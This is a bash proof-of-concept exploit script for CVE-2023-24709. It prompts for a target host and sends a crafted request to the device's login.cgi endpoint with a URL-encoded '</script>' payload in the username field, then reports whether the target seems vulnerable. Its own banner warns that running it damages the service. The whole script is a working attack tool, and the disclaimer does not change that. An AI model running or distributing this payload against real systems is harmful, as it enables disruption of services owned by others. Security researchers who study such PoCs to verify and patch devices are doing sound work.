#!/bin/bash

# Warning banner message
display_banner() {
  echo "***************************************************************************************"
  echo "*										      *"
  echo "*                                 PoC CVE-2023-24709                                  *"
  echo "* 		       BE AWARE!!! RUNNING THE SCRIPT WILL MAKE			      *"
  echo "*  		     A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!  		      *"
  echo "*                                                   				      *"
  echo "*  ->> Be aware that by executing this script against any target, you acknowledge     *"
  echo "*  that you understand the potential risks, including possible damage to the system.  *"
  echo "*                                                        			      *"
  echo "*  ->> The author of this script is not responsible for any type of harm, loss,       *"
  echo "*  or damage resulting from its use.  				                      *"
  echo "*                                    				                      *"
  echo "*  ->> Use the script at your own risk and ensure you have adequate backups and	      *"
  echo "*  safeguards in place before proceeding. 			                      *"
  echo "*                                    				                      *"
  echo "*                         			    by Giorgi Dograshvili (Dragown)   *"
  echo "*  										      *"
  echo "***************************************************************************************"
}

# Specifying the target
display_banner
  echo ""
  echo ""
  echo "Enter the domain or IP address with or without port (by default 80 port is used)"
  echo "(e.g. example.net, or 192.168.12.34, or 999.88.77.66:443, or 192.168.56.78:8443)"
read -p  "Target: " domain

# User confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
  # Display loading animation
  animation=("|" "/" "-" "\\")
  index=0
  while [[ $index -lt 10 ]]; do
    echo -ne "Loading ${animation[index]} \r"
    sleep 1
    index=$((index + 1))
  done

# Execution
  response=$(curl -i -s -k -X GET \
    -H "Host: $domain" \
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
    -H "Accept: */" \
    -H "Referer: http://$domain/login.html" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Accept-Language: en-US,en;q=0.9" \
    -H "Connection: close" \
    --max-time 10 \
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

# Showing the result
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  else
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"
  fi
else
  echo "The script is stopped!."
fi